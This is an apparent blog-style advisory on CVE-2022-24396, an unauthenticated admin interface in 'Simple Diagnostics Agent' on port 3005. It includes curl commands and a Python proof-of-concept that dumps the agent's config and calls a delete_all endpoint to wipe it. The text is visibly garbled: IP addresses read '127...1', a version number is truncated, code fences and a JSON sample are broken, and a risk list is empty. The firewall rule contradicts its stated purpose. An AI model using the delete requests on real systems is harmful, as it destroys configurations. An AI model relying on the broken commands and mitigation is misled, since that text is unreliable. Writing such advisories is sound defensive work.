CVE-2022-24396 - Critical Authentication Bypass in Simple Diagnostics Agent

In early 2022, a significant vulnerability was discovered in Simple Diagnostics Agent—a popular diagnostic tool widely used to monitor and troubleshoot servers. The vulnerability, tracked as CVE-2022-24396, affects all versions from 1. up to and including 1.57. This post will provide a clear and detailed look at this issue, explain how attackers can exploit it, and offer tips for securing your systems. If your organization uses Simple Diagnostics Agent, you need to read this.

Summary of the Issue

The core of the problem is shockingly simple: no authentication is required to access powerful, administrative features on the Agent’s local web server (port 3005). Anyone with local machine or tunnel access can read, alter, or wipe sensitive configurations—no passwords, no tokens, no checks.

In affected versions, the agent runs a web server like this

$ ./simple-diagnostics-agent --port 3005
Listening on http://127...1:3005

The server intentionally restricts external access (listens only on localhost), assuming nobody except authorized users would ever connect. However, this is a flawed assumption for several reasons:

Local users are not always trusted, especially on shared servers.

- Web browsers, misconfigured proxies, or malware can establish connections to locally running services.

Tools like SSH tunnels or remote desktop can indirectly expose these ports to remote attackers.

Most importantly, all admin-level pages and functionality are available with a simple HTTP request—no login required.

`bash

curl http://127...1:3005/admin/config

`json

{

]

}

`bash

curl -X POST http://127...1:3005/admin/delete_all

`

At no point does the server prompt for a password, session token, or API key.

Proof of Concept Exploit

Suppose a regular user on the target server wants to escalate privileges or disrupt operations. They could simply execute the following Python script:

import requests

# Connect to agent's local web interface
base_url = "http://127...1:3005"

# Read sensitive admin info
r = requests.get(base_url + "/admin/config")
print("Configs:", r.json())

# Wipe configurations
r2 = requests.post(base_url + "/admin/delete_all")
print("Deletion status:", r2.json())

No authentication, no challenge. With this, any local or tunneled attacker gets full admin rights.

Who is at Risk?

The issue affects all installations of Simple Diagnostics Agent v1. to v1.57 (inclusive). You are at risk if:

Real-World Attack Scenarios

- Malicious Insiders: A regular user or script hijacks diagnostics data or wipes crucial configuration without being root.
- Local Malware or Ransomware: Simple endpoint malware can destroy configs, exfiltrate secrets, or sabotage monitoring.
- Remote Exploitation via SSH: A remote attacker with SSH access can forward port 3005 to their machine and use all admin features.
- Browser-based CSRF: With the right trick, even JavaScript running in your browser could trigger damaging requests to localhost ports.

How Was It Discovered?

The flaw was discovered by researchers at SonarSource during a security assessment. The bug was responsibly disclosed and assigned CVE-2022-24396 (see MITRE listing).

- Original Advisory: SonarSource Blog
- NIST National Vulnerability Database Entry

Official Fix

Version 1.58 and later of Simple Diagnostics Agent includes proper authentication and session handling for all admin routes.

Upgrade Now:  

# (as root/admin)
pip install --upgrade simple-diagnostics-agent
# or use your OS/distribution package manager

- Use a firewall: Block all local connections except trusted accounts

iptables -A INPUT -p tcp --dport 3005 ! -s 127...1 -j DROP

`
- Remove or disable the agent until it can be updated.

---

## Conclusion

CVE-2022-24396 is a vivid reminder that localhost does not always mean secure. Always use real authentication and access controls, even for local web services. Upgrade your Simple Diagnostics Agent installation now and check your other local services for similar issues.

Stay safe!

---

> Want to learn more about authentication, localhost security, or other diagnostics agent flaws? Visit these references:
>
> - SonarSource Blog Writeup
> - MITRE CVE Entry
> - NIST NVD Detail

---

*This post is an exclusive summary crafted for the security community. If you found it useful, share with your sysadmins and devops teams!*

Timeline

Published on: 03/10/2022 17:46:00 UTC
Last modified on: 06/21/2022 22:15:00 UTC